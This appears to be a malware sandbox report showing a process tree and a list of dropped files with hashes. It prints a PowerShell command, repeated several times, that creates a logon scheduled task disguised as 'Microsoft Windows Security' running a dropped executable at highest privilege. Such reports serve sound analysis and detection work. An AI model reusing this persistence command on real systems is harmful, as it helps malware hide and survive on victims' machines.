                                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                                  2⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:1596
                                                • C:\Windows\System32\schtasks.exe
                                                  C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"
                                                  2⤵
                                                    PID:2244
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                                    2⤵
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:3920
                                                  • C:\Windows\System32\conhost.exe
                                                    C:\Windows\System32\conhost.exe
                                                    2⤵
                                                      PID:1104
                                                    • C:\Windows\System32\dwm.exe
                                                      C:\Windows\System32\dwm.exe
                                                      2⤵
                                                      • Suspicious use of FindShellTrayWindow
                                                      • Suspicious use of SendNotifyMessage
                                                      PID:1736
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                                      2⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:3416
                                                    • C:\Windows\System32\schtasks.exe
                                                      C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"
                                                      2⤵
                                                        PID:880
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                                        2⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:1988
                                                    • C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe
                                                      "C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"
                                                      1⤵
                                                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                      • Executes dropped EXE
                                                      • Suspicious use of SetThreadContext
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of WriteProcessMemory
                                                      PID:2496
                                                    • C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe
                                                      "C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"
                                                      1⤵
                                                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                      • Executes dropped EXE
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:4436
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 2044 -ip 2044
                                                      1⤵
                                                        PID:4912
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1380 -ip 1380
                                                        1⤵
                                                          PID:3828
                                                        • C:\Windows\System32\smss.exe
                                                          \SystemRoot\System32\smss.exe 00000098 00000084
                                                          1⤵
                                                            PID:3328
                                                          • C:\Windows\System32\smss.exe
                                                            \SystemRoot\System32\smss.exe 00000118 00000084
                                                            1⤵
                                                              PID:4628
                                                            • C:\Windows\System32\smss.exe
                                                              \SystemRoot\System32\smss.exe 000000f0 00000084
                                                              1⤵
                                                                PID:1168
                                                              • C:\Windows\System32\smss.exe
                                                                \SystemRoot\System32\smss.exe 00000134 00000084
                                                                1⤵
                                                                  PID:5116
                                                                • C:\Windows\System32\smss.exe
                                                                  \SystemRoot\System32\smss.exe 000000f4 00000084
                                                                  1⤵
                                                                    PID:2284
                                                                  • C:\Windows\System32\smss.exe
                                                                    \SystemRoot\System32\smss.exe 000000d4 00000084
                                                                    1⤵
                                                                      PID:3900
                                                                    • C:\Windows\System32\smss.exe
                                                                      \SystemRoot\System32\smss.exe 00000100 00000084
                                                                      1⤵
                                                                        PID:3524

                                                                      Network

                                                                      MITRE ATT&CK Enterprise v15

                                                                      Replay Monitor

                                                                      Loading Replay Monitor...

                                                                      Downloads

                                                                      • C:\$Recycle.Bin\S-1-5-21-1361837696-2276465416-1936241636-1000\DDDDDDDDDDD

                                                                        Filesize

                                                                        129B

                                                                        MD5

                                                                        53de377db9605faa35d2711b937ded16

                                                                        SHA1

                                                                        7e4b727f3764acfa88e206920a130301194138c0

                                                                        SHA256

                                                                        acd6d23957be255861f4203c65f1f9ca4195acb17dbb7d43851c14f5b54a9396

                                                                        SHA512

                                                                        8749afb3441cecb011c80ef66ab2db823b4c0a9df0f60663bdbc068585fa6a58164bfcb2167e4eea87102ac6736a84326f9e96163aa390b41d2bb78d04dfb927

                                                                      • C:\IPjaex13M.README.txt

                                                                        Filesize

                                                                        334B

                                                                        MD5

                                                                        88f6599d557ec2b7a12b3ab4faf3c364

                                                                        SHA1

                                                                        1bc917d0543deee57c7e13f7ed182c8692e69458

                                                                        SHA256

                                                                        781cf1f98ccd2cf18079967e28996a722e75fa28cb2ecc8b638e2efcdf751e8d

                                                                        SHA512

                                                                        d1633a186dbc849f8c056bd53df4b24f972f170cb4e602b487d89b9762ce78699cf148d70f62272e8e2d13888a73b38910b43c378af8d21102a3fd2e08731d19

                                                                      • C:\Users\Admin\AppData\Local\BioTech Dynamics\BioMind.scr

                                                                        Filesize

                                                                        1.0MB

                                                                        MD5

                                                                        c63860691927d62432750013b5a20f5f

                                                                        SHA1

                                                                        03678170aadf6bab2ac2b742f5ea2fd1b11feca3

                                                                        SHA256

                                                                        69d2f1718ea284829ddf8c1a0b39742ae59f2f21f152a664baa01940ef43e353

                                                                        SHA512

                                                                        3357cb6468c15a10d5e3f1912349d7af180f7bd4c83d7b0fd1a719a0422e90d52be34d9583c99abeccdb5337595b292a2aa025727895565f3a6432cab46148de

                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                                                                        Filesize

                                                                        2B

                                                                        MD5

                                                                        d751713988987e9331980363e24189ce

                                                                        SHA1

                                                                        97d170e1550eee4afc0af065b78cda302a97674c

                                                                        SHA256

                                                                        4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                                        SHA512

                                                                        b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                        Filesize

                                                                        3KB

                                                                        MD5

                                                                        beddacb1b8cdf9b2701ec9ba52fc7a57

                                                                        SHA1

                                                                        42fc5858911200e8615ce0c223d19a3521468773

                                                                        SHA256

                                                                        839ab90ed4c452c99e6610f0bdc0be6290475e34407e5d3fa9c5fb38b6eeaf0e

                                                                        SHA512

                                                                        b738727610cccc12e4271974d7cf95cfaf143bc4010e3e3a90fe31ae922630821d46dad255a3ba7044c45cefaca3cb40696a46d55be0e5b3cc0b58cb5abfc04a

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                                        Filesize

                                                                        2KB

                                                                        MD5

                                                                        f9349064c7c8f8467cc12d78a462e5f9

                                                                        SHA1

                                                                        5e1d27fc64751cd8c0e9448ee47741da588b3484

                                                                        SHA256

                                                                        883481fe331cb89fb6061e76b43acd4dd638c16f499b10088b261036c6d0547b

                                                                        SHA512

                                                                        3229668491b5e4068e743b31f2896b30b1842faf96aff09fad01b08771c2f11eb8d8f02a3b76e31f0d6ad650c2894c5ac1822204e132c03d9c2b8df6ca4cd7cf

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\NEKLO0T0\5[1]

                                                                        Filesize

                                                                        108KB

                                                                        MD5

                                                                        1fcb78fb6cf9720e9d9494c42142d885

                                                                        SHA1

                                                                        fef9c2e728ab9d56ce9ed28934b3182b6f1d5379

                                                                        SHA256

                                                                        84652bb8c63ca4fd7eb7a2d6ef44029801f3057aa2961867245a3a765928dd02

                                                                        SHA512

                                                                        cdf58e463af1784aea86995b3e5d6b07701c5c4095e30ec80cc901ffd448c6f4f714c521bf8796ffa8c47538bf8bf5351e157596efaa7ab88155d63dc33f7dc3

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                        Filesize

                                                                        53KB

                                                                        MD5

                                                                        22cf505cc320ce75f33f6b5f48bf9cab

                                                                        SHA1

                                                                        ba1e6093184fbfdeaded03d4bb92f8ddce674ca2

                                                                        SHA256

                                                                        a57ef05fae2cbae2a9eb9d12d697de5d3e62110e00a935ea28589aa45ef57b08

                                                                        SHA512

                                                                        1188f1ee92bf5135cebb597192703e29be4d8276a1178ae30a02ba33b51e1bae99f237da2f14d06f5cc1ba5ae414e45347ea3f5dcd296c7833c652b49fb716c3

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                        Filesize

                                                                        1KB

                                                                        MD5

                                                                        7b28e8ba65ea8d0cb1a0ae523c0494da

                                                                        SHA1

                                                                        4fa0966840954dd7186176c4787986a301e143aa

                                                                        SHA256

                                                                        79c94378df545880fb70c8cf68edd10e17584865074d77b3ab03d96a7916c436

                                                                        SHA512

                                                                        5a310c06ee69ef55a77fa8dabf748cf587b0393727a95a98c883e868c4e31d5d35f80a010d04089c44f464f8fd9f47102d5871f3dfb51f909dbbd1e8f01d0043

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                        Filesize

                                                                        21KB

                                                                        MD5

                                                                        481e260e1ca8b4f08ec0705e8b9383ab

                                                                        SHA1

                                                                        7dda7a90e5703d004174ad451841be1c59e76d53

                                                                        SHA256

                                                                        6ec5f87aa3497b1c6a3ee7cd39d79dc16bd47171387aefd564bfd4297a212f54

                                                                        SHA512

                                                                        f834e2e04121ff72a553230788d1f109f3f4569841fa3f128843e18d99d8d687e2fb7af4198caff99bf97f23fe7e60315c6b58d4d2f91a0940a59111d80e65d0

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                        Filesize

                                                                        1KB

                                                                        MD5

                                                                        4498be3991c42bf711990ed773673653

                                                                        SHA1

                                                                        ad81c8440a1b422be3d09374c7d69089f2a4b84e

                                                                        SHA256

                                                                        12a3fe4807534f2b3330bdaa9d83f5b5849d1fc01f615039a768bc2f20525d0d

                                                                        SHA512

                                                                        89462027c6262c6fd414654b5a2171d825337e90a13d27357f288b19e78f35a9abd8d050311e95bb95b5c5ecf22df7b2c60e7b3c6b1090b06df15cc5372898b1

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                        Filesize

                                                                        1KB

                                                                        MD5

                                                                        3b67c679b84d7eefb113f87bd50be385

                                                                        SHA1

                                                                        300d1f0a782a1fac8cb60c09844b4a29d20dde61

                                                                        SHA256

                                                                        5af979ea87db0604052b3993e3d5b5bb6de5037f9a280e9bc9863778c47f3712

                                                                        SHA512

                                                                        b9045b16e33b1d840fbccd28861f8a2717e32b96b5fa102d8d4324a3eef177599bbc889b2163905ccd8afe0e7ea4b3716320e2ce33be90bec4ab11c136534ea8

                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                        Filesize

                                                                        1KB

                                                                        MD5

                                                                        a6253ae4760439fdd712f70dec2be499

                                                                        SHA1

                                                                        5f5da738f8b5a0810fca545201f56d8b4be8ff1f

                                                                        SHA256

                                                                        dd5a1fcf5a7c43ce71c14469e38f8ae33b92c4b670de379af9a531235e50e302

                                                                        SHA512

                                                                        2288ad388f3b5a7fcaf1a2d8234a6430075a45565d36250fe609adabeaf12984662c1a7ccb7dc44562c764193aeca22b8d679b3fe3f1a08f838e003943a8e64c

                                                                      • C:\Users\Admin\AppData\Local\Temp\1186626615.exe

                                                                        Filesize

                                                                        8KB

                                                                        MD5

                                                                        cb8420e681f68db1bad5ed24e7b22114

                                                                        SHA1

                                                                        416fc65d538d3622f5ca71c667a11df88a927c31

                                                                        SHA256

                                                                        5850892f67f85991b31fc90f62c8b7791afeb3c08ae1877d857aa2b59471a2ea

                                                                        SHA512

                                                                        baaabcc4ad5d409267a34ed7b20e4afb4d247974bfc581d39aae945e5bf8a673a1f8eacae2e6783480c8baaeb0a80d028274a202d456f13d0af956afa0110fdf

                                                                      • C:\Users\Admin\AppData\Local\Temp\1320819612.exe

                                                                        Filesize

                                                                        49KB

                                                                        MD5

                                                                        6946486673f91392724e944be9ca9249

                                                                        SHA1

                                                                        e74009983ced1fa683cda30b52ae889bc2ca6395

                                                                        SHA256

                                                                        885fbe678b117e5e0eace7c64980f6072c31290eb36d0e14953d6a2d12eff9cd

                                                                        SHA512

                                                                        e3241f85def0efefd36b3ffb6722ab025e8523082e4cf3e7f35ff86a9a452b5a50454c3b9530dfdad3929f74a6e42bf2a2cf35e404af588f778e0579345b38c9

                                                                      • C:\Users\Admin\AppData\Local\Temp\3081912714.exe

                                                                        Filesize

                                                                        10KB

                                                                        MD5

                                                                        96509ab828867d81c1693b614b22f41d

                                                                        SHA1

                                                                        c5f82005dbda43cedd86708cc5fc3635a781a67e

                                                                        SHA256

                                                                        a9de2927b0ec45cf900508fec18531c04ee9fa8a5dfe2fc82c67d9458cf4b744

                                                                        SHA512

                                                                        ff603117a06da8fb2386c1d2049a5896774e41f34d05951ecd4e7b5fc9da51a373e3fcf61af3577ff78490cf898471ce8e71eae848a12812fe98cd7e76e1a9ca

                                                                      • C:\Users\Admin\AppData\Local\Temp\3210330757.exe

                                                                        Filesize

                                                                        65KB

                                                                        MD5

                                                                        15582e6b7aba679732ba5380b2279023

                                                                        SHA1

                                                                        8a87b88e988736645489b04aaf073a4300860227

                                                                        SHA256

                                                                        ab5d90ce12df6b62e3e30c596c3b7ba5724fd2b695dfce163b9ca8f27a934320

                                                                        SHA512

                                                                        82313130df456e6408b82f9b8f16b901dce9651178b9534000ddc83113c2ee9973b3efd523ed559c167039140c7ee9d0a9474302c2dfa49a5bdf23f903316ae8

                                                                      • C:\Users\Admin\AppData\Local\Temp\819525829.exe

                                                                        Filesize

                                                                        79KB

                                                                        MD5

                                                                        0c883b1d66afce606d9830f48d69d74b

                                                                        SHA1

                                                                        fe431fe73a4749722496f19b3b3ca0b629b50131

                                                                        SHA256

                                                                        d921fc993574c8be76553bcf4296d2851e48ee39b958205e69bdfd7cf661d2b1

                                                                        SHA512

                                                                        c047452a23efad4262479fbfeb5e23f9497d7cefd4cbb58e869801206669c2a0759698c70d18050316798d5d939b989537fdce3842aa742449f5e08ed7fa60a5

                                                                      • C:\Users\Admin\AppData\Local\Temp\Booty

                                                                        Filesize

                                                                        5KB

                                                                        MD5

                                                                        456e8d3795990ee35e9cbc227cd15982

                                                                        SHA1

                                                                        9975e340561e157ac4e3c4c8fd33d7eef308268d

                                                                        SHA256

                                                                        c9a8704bdb3aced2af9ef516c6c1ea53145460a763d54bacf3da50f07fbee52e

                                                                        SHA512

                                                                        bbf344bee7a00522667aca111db321d9520ce5e986e4f7069343923553388321b95479897af013ce214783f23ce665980c67d2998373c3f61a1ce1c30bd93f69

                                                                      • C:\Users\Admin\AppData\Local\Temp\Files\343dsxs.exe

                                                                        Filesize

                                                                        413KB

                                                                        MD5

                                                                        7b0a50d5495209fa15500df08a56428f

                                                                        SHA1

                                                                        ab792139aaa0344213aa558e53fa056d5923b8f0

                                                                        SHA256

                                                                        d7f591f60eea358649cd97b73296b31a682e22fc5784df440026c3086de3d835

                                                                        SHA512

                                                                        c1fe0cb875124c9069f01fc3ef44d864ec82cfad49ee733edecd8b9b5e021594937362641aa33d865aa8a3ec376e46162c988906b0cb7bd0666e873988fe3661

                                                                      • C:\Users\Admin\AppData\Local\Temp\Files\DeliciousPart.exe

                                                                        Filesize

                                                                        854KB

                                                                        MD5

                                                                        8432070440b9827f88a75bef7e65dd60

                                                                        SHA1

                                                                        6c7a2124b7076383f577eb0042f9ea917b2b4066

                                                                        SHA256

                                                                        459443def8fd0c940b2da33d9703fcf5771dbcd9ce4aff2dcc670528c1d1d3c1

                                                                        SHA512

                                                                        50d8ca74f51257b03678fcb9e98b8ad3eb412403d3b87efdba1dbf09af207aba6e21f849fe811600467e4d5803188ed8e521c407e8942adf0a002c1d937bbf61

                                                                      • C:\Users\Admin\AppData\Local\Temp\Files\crypted8888.exe

                                                                        Filesize

                                                                        208KB

                                                                        MD5

                                                                        031836b5b4c2fc0ba30f29e8a936b24e

                                                                        SHA1

                                                                        adc7e7ec27f548afd50fac684c009cfe5c2e0090

                                                                        SHA256

                                                                        bf4f27f6932ce75b1746f5364af3abacbdafa59913da513a168d86ea0ad3a3a4

                                                                        SHA512

                                                                        ac58ed6b9a3ce4c35366e99e72e4ee1c87048a11979c91f69740d49b3c1f4f4dc3cbaa66287c73530806b8359933e7b6df0bbab01bc3dd4f351988a6a3cd3b6d

                                                                      • C:\Users\Admin\AppData\Local\Temp\Files\hell9o.exe

                                                                        Filesize

                                                                        172KB

                                                                        MD5

                                                                        2e933118fecbaf64bbd76514c47a2164

                                                                        SHA1

                                                                        a70a1673c4c7d0c0c12bc42bc676a1e9a09edc21

                                                                        SHA256

                                                                        5268359ebc3f9e709c8eee1fa9d3e7c579b3e4563fabb9c394abe0fe2e39137f

                                                                        SHA512

                                                                        c34672e55625462d16051cd725c96d634e459d61a9552f858f0b234d5eedf67594ca336f4fd695e3046c4e0485d4fa4497b6c604ee4144c49a6c1c0838628bdb

                                                                      • C:\Users\Admin\AppData\Local\Temp\Files\lum250.exe

                                                                        Filesize

                                                                        1.8MB

                                                                        MD5

                                                                        5b015748645c5df44a771f9fc6e136c3

                                                                        SHA1

                                                                        bf34d4e66f4210904be094e256bd42af8cb69a13

                                                                        SHA256

                                                                        622c5cb9a11085da8240c94262f596b687b3ecc2bc805b7f5a01cc335f7df909

                                                                        SHA512

                                                                        026a32a969f973f91f6e848ce3509546ef70bddfdb39ed08c177c2cd1eddeb1297a2d722fa8542a9a09a3d0b9d4c8df0d35139b1c7ae0beba1b964a6b8003302

                                                                      • C:\Users\Admin\AppData\Local\Temp\Files\nxmr.exe

                                                                        Filesize

                                                                        5.6MB

                                                                        MD5

                                                                        13b26b2c7048a92d6a843c1302618fad

                                                                        SHA1

                                                                        89c2dfc01ac12ef2704c7669844ec69f1700c1ca

                                                                        SHA256

                                                                        1753ad35ece25ab9a19048c70062e9170f495e313d7355ebbba59c38f5d90256

                                                                        SHA512

                                                                        d6aff89b61c9945002a6798617ad304612460a607ef1cfbdcb32f8932ca648bcee1d5f2e0321bb4c58c1f4642b1e0ececc1eb82450fdec7dff69b5389f195455

                                                                      • C:\Users\Admin\AppData\Local\Temp\Files\pei.exe

                                                                        Filesize

                                                                        9KB

                                                                        MD5

                                                                        8d8e6c7952a9dc7c0c73911c4dbc5518

                                                                        SHA1

                                                                        9098da03b33b2c822065b49d5220359c275d5e94

                                                                        SHA256

                                                                        feb4c3ae4566f0acbb9e0f55417b61fefd89dc50a4e684df780813fb01d61278

                                                                        SHA512

                                                                        91a573843c28dd32a9f31a60ba977f9a3d4bb19ffd1b7254333e09bcecef348c1b3220a348ebb2cb08edb57d56cb7737f026519da52199c9dc62c10aea236645

                                                                      • C:\Users\Admin\AppData\Local\Temp\Files\random.exe

                                                                        Filesize

                                                                        4.2MB

                                                                        MD5

                                                                        b3dc981652f781ec4bbd152e7d14a1ac

                                                                        SHA1

                                                                        1d726d4399d9f34e891187e2e7d29ebdcbc4da61

                                                                        SHA256

                                                                        abf8b7685a4a38bb376bee90dc89adcf881033dab98b53081e9475045126c62c

                                                                        SHA512

                                                                        b9f212e51a6319604948e146fccd31f142473add8508c19686f3d35ff0dd74f3d6ddf41618d084aab732d878c5d58d0b60979734a7c8f5271119fb8653e7a58e

                                                                      • C:\Users\Admin\AppData\Local\Temp\Files\s.exe

                                                                        Filesize

                                                                        96KB

                                                                        MD5

                                                                        930c41bc0c20865af61a95bcf0c3b289

                                                                        SHA1

                                                                        cecf37c3b6c76d9a79dd2a97cfc518621a6ac924

                                                                        SHA256

                                                                        1f2e9724dfb091059ae16c305601e21d64b5308df76ddef6b394573e576ef1ff

                                                                        SHA512

                                                                        fa1f33c71da608b3980038981220fcebee0b0cc44331e52f5198dd2761c97631ee8286756c2cc16245a1370c83bb53cc8ea8ef64e0fcdd30af51f023973986b2

                                                                      • C:\Users\Admin\AppData\Local\Temp\Files\softina.exe

                                                                        Filesize

                                                                        125KB

                                                                        MD5

                                                                        1ec718ada22e61a5bbbc2407a842b95b

                                                                        SHA1

                                                                        c3cb7876db3734c686b64a7bf83984bf61a2a9ef

                                                                        SHA256

                                                                        2e3bc4c6b0789469f9b7fe876adbc47b5b22f6b15ec7dff70ad588d838937677

                                                                        SHA512

                                                                        ccc2b06edd4b724eba92f251bc62df424c61ea0668c06b06080a1206021889b5791855672f422ecfe889aba6d8b4f8fccf6ba23eddf358e7d84056a549e5fb8f

                                                                      • C:\Users\Admin\AppData\Local\Temp\Files\surfex.exe

                                                                        Filesize

                                                                        310KB

                                                                        MD5

                                                                        1f4b0637137572a1fb34aaa033149506

                                                                        SHA1

                                                                        c209c9a60a752bc7980a3d9d53daf4b4b32973a9

                                                                        SHA256

                                                                        60c645c0a668c13ad36d2d5b67777dedf992e392e652e7f0519f21d658254648

                                                                        SHA512

                                                                        4fd27293437b8bf77d15d993da2b0e75c9fba93bd5f94dad439a3e2e4c16c444f6a32543271f1d2ad79c220354b23301e544765ca392fc156267a89338452e86

                                                                      • C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe

                                                                        Filesize

                                                                        164KB

                                                                        MD5

                                                                        4cbc3c777f08cfbd14fc1ead80a5dd50

                                                                        SHA1

                                                                        dc94c1792a3ca2531dde570f9142c82c6336fadb

                                                                        SHA256

                                                                        115eb84390be11a5cbd396a9b950fcbe799e1684d0a6995ada7bca184fffba8f

                                                                        SHA512

                                                                        dee450b527956f9f22034984afdfd4c8c2a3e9933ad847c48bbe1873113b299814900137c98e8e25875230a649e8c46a77b5505729b3cd785c69b1df161a62b1

                                                                      • C:\Users\Admin\AppData\Local\Temp\Files\whiteheroin.exe

                                                                        Filesize

                                                                        729KB

                                                                        MD5

                                                                        ca0a3f23c4743c84b5978306a4491f6f

                                                                        SHA1

                                                                        58cf2b0555271badc3802e658569031666cb7d7e

                                                                        SHA256

                                                                        944113e85a7cf29d41fbbb30f87ea2554d036448a0bdb1e4e2b2ade3f99a9359

                                                                        SHA512

                                                                        9767f2afbe92eddc46a5654f7f8d6eb10da305df5b009d7407ba9822e5d0f9cc374728900e5ebed15e9849f155a77f44d96f16b4bcca650a42257bdca7f29cbd

                                                                      • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\regdel.CMD

                                                                        Filesize

                                                                        159B

                                                                        MD5

                                                                        e26bcceba32f987399a0decf331f0697

                                                                        SHA1

                                                                        64540b56c5ff6dbb963faa50a85159c62edf7365

                                                                        SHA256

                                                                        0fd1b221f5a865fd9d796857f51724ad6460d409e2cffe8cfaef091daa689d05

                                                                        SHA512

                                                                        d96236da499970dfd6702150a5140e947547e50e3ec6b5ee3d7923ddcc637a01a9e747ecac0b81d4268cbe1a7788c63d5b4ec1373fc46318d8a5d676f510d508

                                                                      • C:\Users\Admin\AppData\Local\Temp\RGI40A4.tmp

                                                                        Filesize

                                                                        24KB

                                                                        MD5

                                                                        033649d7b623b2f8cd29854ccb6d6a4b

                                                                        SHA1

                                                                        9772f7b7b11625fc3dea7598cdf5b6d0fc511ae6

                                                                        SHA256

                                                                        04a0fbd0b5c3e4f7e3558a3871fe3f3cce5013a330941c3e72b4cdb19c81f2ad

                                                                        SHA512

                                                                        90df8c97c8d8062970d76af2235c3ab78208c95c332bbc04e72e2782cb926ab12dbb1098914f453eb7b095ee7dc50f80d4cb96c5931a51a25efb5d91a3c50989

                                                                      • C:\Users\Admin\AppData\Local\Temp\Tall

                                                                        Filesize

                                                                        10KB

                                                                        MD5

                                                                        7bb1b88b0dad0d85e482bf27d8ed266f

                                                                        SHA1

                                                                        53621cae980c2232d1a06b834ee54f4cc551901c

                                                                        SHA256

                                                                        f06031fd4be1e9e5d057622752c9d1f1ce4511c2839f4b218b4d5fa89a783225

                                                                        SHA512

                                                                        cc479a4aed0568ddbf47d6e83d2a4f837fac47000244a7b6ceb81c02ab4480ae7a0dcf5d38cf05e179ff6fbc69e32e08041cdf65d52fe092de59fd3840d8a70d

                                                                      • C:\Users\Admin\AppData\Local\Temp\TmpBB1D.tmp

                                                                        Filesize

                                                                        2KB

                                                                        MD5

                                                                        1420d30f964eac2c85b2ccfe968eebce

                                                                        SHA1

                                                                        bdf9a6876578a3e38079c4f8cf5d6c79687ad750

                                                                        SHA256

                                                                        f3327793e3fd1f3f9a93f58d033ed89ce832443e2695beca9f2b04adba049ed9

                                                                        SHA512

                                                                        6fcb6ce148e1e246d6805502d4914595957061946751656567a5013d96033dd1769a22a87c45821e7542cde533450e41182cee898cd2ccf911c91bc4822371a8

                                                                      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qnwcjyz4.nwo.ps1

                                                                        Filesize

                                                                        60B

                                                                        MD5

                                                                        d17fe0a3f47be24a6453e9ef58c94641

                                                                        SHA1

                                                                        6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                        SHA256

                                                                        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                        SHA512

                                                                        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                      • C:\Users\Admin\AppData\Roaming\Google\Libs\WR64.sys

                                                                        Filesize

                                                                        14KB

                                                                        MD5

                                                                        0c0195c48b6b8582fa6f6373032118da

                                                                        SHA1

                                                                        d25340ae8e92a6d29f599fef426a2bc1b5217299

                                                                        SHA256

                                                                        11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5

                                                                        SHA512

                                                                        ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d

                                                                      • C:\Users\Admin\AppData\Roaming\d3d9x.dll

                                                                        Filesize

                                                                        765KB

                                                                        MD5

                                                                        4bb92f145d95b180e356baf280e283f0

                                                                        SHA1

                                                                        05e6167c0af3ef8c01724469f1ad815f3b6a665d

                                                                        SHA256

                                                                        7438b6d40f44532a6fdb0bf2e4c936d672a10e5b3f8f3011d37736c51767f949

                                                                        SHA512

                                                                        548b9080c7ab9227c4a6f41507b5488b1bb2652537596fff9208a40131fd59f890e4b97773b511353679c934c3a869666c79ba3a26600cb30df5e1e5d84b9644

